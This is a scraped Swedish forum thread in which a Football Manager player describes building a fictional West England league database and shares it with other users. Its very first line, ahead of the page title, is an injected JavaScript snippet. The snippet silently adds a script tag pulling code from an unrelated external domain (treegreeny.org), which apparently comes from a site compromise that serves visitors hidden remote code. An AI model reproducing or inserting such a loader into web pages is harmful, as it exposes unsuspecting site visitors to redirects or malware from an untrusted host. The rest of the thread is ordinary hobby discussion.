;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Wengland (West England) Databas (Released v.2.21) – Football Manager 2021 – FMSweden Forum
Meny Stäng

Wengland (West Engl...
 
Share:
Notifications
Clear all

Wengland (West England) Databas (Released v.2.21)

7 Inlägg
2 Users
10 Reactions
833 Visningar
antonr
(@antonr)
Active Member
Blev medlem: 3 år sedan
Inlägg: 5
Topic starter  

Jag vet, jag vet... Detta är forumet för FM 21... Dock, när jag började skapa den här databasen fanns inget annat än FM 19 att tillgå för min del. OCH då detta är mitt hjärtebarn (och få eller ingen besöker forumsidorna för äldre FM-spel när de nya väl kommit ut) så väljer jag att placera tråden här: 

När jag var 10 år gammal kom jag på idén att skapa en alldeles egen Premier League, med påhittade klubbar, påhittade arenanamn och påhittade spelare från riktiga länder. På en gammal dator (detta var 2003-ish) skapade jag ett worddokument med 14 påhittade, engelsklåtande klubbar med varsin spelare per lag. Sedan slog jag med tärning för att få fram resultatet i de olika matcherna och på så vis få fram min allra första Premier League-vinnare.

Samma sommar hade mina föräldrar fått för sig att köpa ett nytt sommarhus. Eftersom jag var tio år blev det tvunget att jag skulle vara med där till de bestämde att vi skulle återvända hem igen. Som ensambarn och med en oändlig mängd fritid bestämde jag mig för att utvidga min liga. En spelare per lag blev till två, som sedan blev tre och fyra. Där och då kom funderingarna på hur kul det skulle vara att ha en hel startelva för vart och ett av de fjorton lagen. Med lite hjälp av min bästa barndomskompis hade jag till slut fått fram de 14x11 spelarna som krävdes och började laborera med laguppställningar och positioner.

Dock... En svala gör ingen sommar och elva spelare gör ingen spelartrupp. Självklart behövde lagen avbytare också! Så jag bestämde mig för att addera ytterligare fem spelare per lag; en reserv per position (målvakt, försvarare, innermitt, ytter och anfallare) för att på så vis kunna göra byten i min alldeles egen PL som, märk väl, fortsatt bara existerade i ett worddokument och i min egna fantasi.

Med 14x16 spelare skapade kände jag mig relativt nöjd med min förstaliga. Problemet nu var snarare vad som skulle hända när första säsongen var över. Eftersom jag inte ville ha en stängd liga utan ruljans på lagen i botten, skapade jag hastigt och lustigt 14 ytterligare lag för en andradivision.

Dessa 14 lag behövde självfallet också spelare, så en efter en tillkom elva spelare per lag även här. Som en sista grädde på moset skapade jag även tillräckligt med lag för en tredjedivision, dock utan spelarnamn.

Någon gång här dog intresset och min egen Premier League föll i glömska i takt med att högstadiet, puberteten och verkligheten kom ikapp mig.

Vi flyttar framåt i tiden, sisådär 16 år. I början av förra året var jag hemma hos mina föräldrar och vände i samband med flytt. Eftersom de också skulle till att flytta kom det sig att jag tittade genom gamla barndomsminnen. Vips, så hittade jag det utskrivna worddokumentet med min Premier League. Nostalgia deluxe!

När sedan pandemin förhindrade min flytt till Irland behövde jag någonting att sysselsätta mig med i väntan på bättre tider. Jag hade köpt FM 19 sommaren före, men utan att spela särskilt mycket alls.

Idén kom plötsligt: Skulle det inte vara kul att använda all dötid för att skapa en virtuell version av min Premier League i FM-editorn? Jag checkade upp lite hur jag skulle gå tillväga och bestämde mig sedan för att behålla nuvarande Premier League som den är och istället ersätta ett mindre fotbollslands liga med min egen fiktiva värld. Wales was no more. Världen, say hello to West England! Förkortat till Wengland skapades nu ett helt seriesystem där de befintliga klubbarna byttes ut mot mina påhittade. Alla befintliga spelare i ligan försvann och istället tillkom mina gamla gunstlingar, en efter en, i systemet.

Vi hade skyttekungen Ryan Call, en engelsk målmaskin med rakad skalle i Roumdon Football Club. Vi hade hans antagonist Dino Zwechewsky i Allneiss United. Där fanns den flärdige italienaren och frisparksspecialisten Roberto Fanessi i Zonro FC. Nu förstår jag hur Gepetto måste känt sig när han blåste liv i trädockan Pinocchio.

Sakta men säkert tog ligan (läs ligorna) form. Att skapa spelarna var en sak, att ge dem någorlunda rättvis förmåga och potential var lite knivigare. Att få klubbarna och ligorna att fungera som smort var jävligt mycket tuffare. Mycket hår slets mellan varven, tills systemet började närma sig en typ av betaversion. Exempelvis ville jag att klubbarna i förstaversionen (som ändå var mitt originalprojekt och min första kärlek) skulle ha en fördel jämfört med resten. Därför infördes att kvalsystem istället för direkt upp- och nedflyttning. För att få spelarna att vilja stanna i sina originalklubbar så mycket som möjligt fick alla dessutom älska sina nuvarande klubbar till max.

Efter en dryg månad av intensivt arbete var ligorna redo för testspelande. Jag simulerade tjugo säsonger och... Allt fungerade som det skulle. Jag var nöjd. Det var dags för ett nytt projekt. Än en gång föll min Premier League i glömska.

Detta tills för en dryg vecka sedan, när jag för första gången faktiskt startade en save med ett av lagen. Nu är jag hooked.

Eftersom jag just i detta nu sitter på ett tåg till Sthlm och prokrastrinerar mitt arbete slog det mig bara att det kanske finns någon annan där ute som känner att man vill ta sig an en klubb i Wenglands sinnrika värld? 

Om så är fallet, så skriv bara till mig antingen här i tråden eller via privat meddelande så får du en länk till Wengland-filen i rar-format. I filen ingår klubbmärken, kits och alla dataändringar som behövts göras. Det finns två editorfiler som båda behöver användas. Den ena är Wengland i sig, och den andra gör så att Brexit inte inträffar. Med ett existerande Brexit blev min lilla låtsasvärld inte alls särskilt kul att vara i, märkte jag snabbt. Det finns också en fil som behöver ersätta den nuvarande 1930-mappen i steamapps-common yada yada, men det finns tydligt instruerat i namnet på mappen ifråga.

Lite allmän information annars om Wengland:

  • Wengland existerade inte när jag skapade min ursprungsliga. Då var istället idén att skapa ett alternativt England. Därav finns många fler engelska spelare i klubbarna än vad det finns wengelska spelare.
  • Alla spelare som jag ursprungligen skapade som walesare i ursprungsdokumentet blev därför wengländare i FM-versionen.
  • Alla walesiska spelare (inkluderat Gareth Bale och Aaron Ramsey) bytte nationalitet till Gibraltar för att inte ge Wengland någon fördel från start. Landet ska byggas upp av mina påhittade spelare och talanger som kommer underifrån. Det är dock ganska roligt att se Gibraltar ha en period som tillfällig maktfaktor i den europeiska fotbollen.
  • Wengland har absolut noll i eurokoefficienter när spelet börjar. Det innebär att europaplatserna är få och konkurrensen hög. Detta brukar dock rätta till sig fort, då spelarna i förstaligeklubbarna (plus klubbarnas rykte) är tillräckligt bra för att konkurrera väl i både CL-kval och Europa League-gruppspel.
  • Alla wengelska klubbar har bra till fantastisk ungdomsakademi, vilket gör att urvalet för landslagen fylls på snabbt.
  • Newgens kommer fram redan när de är 14-15 år och kan signa proffskontrakt vid 16, för att ge de mest möjliga tid att utvecklas. Eftersom lagen i lägre divisioner inte har några spelare alls när spelet börjar är detta ett sätt att se till att de kan få igång en form av positiv utveckling tidigt.
  • Kvalspel gäller mellan alla divisioners uppflyttning. I Premier League får lag 13 och 14 spela en kvalserie mot lag 1 och 2 från Wenglish Division 1 (divisionen under). På samma sätt möter de två sistaplacerade lagen i Division 1 de två bästa lagen i Wenglish Premier Alliance (tredjedivisionen) efter slutspelad serie. Mellan Wenglish Premier Alliance och de fyra förgrenade divisionerna under sker ett kvalspel mellan de två sistnämnda lagen i förstnämnda divisionen och de fyra vinnarna i fjärdedivisionerna.
  • Det finns tre inhemska cuper. Calippo Cup är som FA-cupen, League Cup är... well, som ligacupen obviously och Burt Reynolds' Mahogny League Cup är för lagen under de två översta versionerna. Bra prispengar väntar för cupvinnare.
  • I slutet av varje säsong möts även vinnarna av de fyra inhemska wengelska titlarna (Premier League, Calippo Cup, League Cup och Mahogny League Cup) i en slutspelsserie benämnd som Premier Cup, där vinnarna får en pokal och en prissumma. Självklart är vinnarna av Mahogny Cup alltid chanslösa, men det är roligt för dem att få mäta sig med de stora rävarna.
  • TV-avtal är frikostigt utan att kännas överdrivet (enligt mig) och om jag inte missminner mig finns även någon form av fallskärmsavtal för nedflyttade lag från de översta tre divisionerna. Alla mina skapade lag har samma ekonomiska villkor från början, med starka ägare som kan skjuta in pengar om allt skulle gå åt helvete.

 

För er som vill ge er in i Wenglands magiska värld; min skapelse är nu vår. Lycka till! Och må bästa wengelska lag vinna.

 

Wengland Complete.rar

This topic was modified 3 år sedan 4 times by antonr

   
Citera
Micke
(@micke)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 239
 

Helt underbart projekt, stor cred till att du lagt ner så mycket tid för att realisera allting också. Vore riktigt skoj att få testa denna databas.

"I have never played for a draw in my life." - Sir Alex Ferguson


   
SvaraCitera
antonr
(@antonr)
Active Member
Blev medlem: 3 år sedan
Inlägg: 5
Topic starter  

@micke Haha tack! Jag är jävligt glad att jag gav mig tiden att göra det här. Utan pandemin och dåtiden hade det antagligen bara förblivit en glömd idé. Skickar databasen i drivelänk till dig i PM så fort jag kommer till jobbet.


   
SvaraCitera
antonr
(@antonr)
Active Member
Blev medlem: 3 år sedan
Inlägg: 5
Topic starter  

Hmm, jag kan visst inte skicka privata meddelanden här på sidan. Förmodar att det är pga att jag är ny medlem och att det bara är tillfälligt.

Om det är någon som vill få tillgång till databasen redan nu så skicka ett privat meddelande till mig med mailadress, så skickar jag Drive-länken över mail istället.


   
SvaraCitera
Micke
(@micke)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 239
 

Går det inte bara att lägga ut den här i tråden då? Tror många skulle vilja testa databasen 🙂

"I have never played for a draw in my life." - Sir Alex Ferguson


   
SvaraCitera
antonr
(@antonr)
Active Member
Blev medlem: 3 år sedan
Inlägg: 5
Topic starter  

Ja vafan. Varför inte egentligen? Jag ville bara ha lite koll på vilka som laddade ner den för att kunna checka hur det gick för er, men gjorde som du sa nu och la länken i första inlägget.

Lycka till!

Och skriv gärna här i tråden hur det går för er när ni testar 🙂


   
Micke reacted
SvaraCitera
antonr
(@antonr)
Active Member
Blev medlem: 3 år sedan
Inlägg: 5
Topic starter  

Ny mindre grafisk uppdatering fixad och uppladdad.

Märkte att Wales flagga fortfarande hade en tendens att dyka upp här och var. Nu ska det vara fixat.

Jag är för närvarande på min tredje säsong med tredjeligalaget, oljefinansierade Middleeast Juniors med gamle saudiske landslagsspelaren Sami Al-Jaber som ordförande och finansiär. Kom trea i ligan första säsong för att sedan vinna den storstilat året därpå. Tyvärr blev uppflyttningskvalet dock numret för stort och Middleeast fick återgå till Wenglish Premier Alliance för en tredje säsong...

Lite segt, men det ger i alla fall mig ytterligare en möjlighet att vinna Wenglands motsvarighet till EFL Trophy; Mahogny League Cup och därigenom få till en titel.

Mohamed Bangura var inne och... Jag skulle inte säga dominerade, men han bidrog i varje fall till seriesegern under fjolåret. Likaså gjorde Viktor Noring. Annars är det ungdomarnas lag och ungdomarnas liga. 14-åringarna som kom upp första säsongen har nu blivit 16 och roteras gradvis in i laget för att kunna bli antingen bärande eller uppköpta på resan upp genom divisionerna.


   
Micke reacted
SvaraCitera
Share: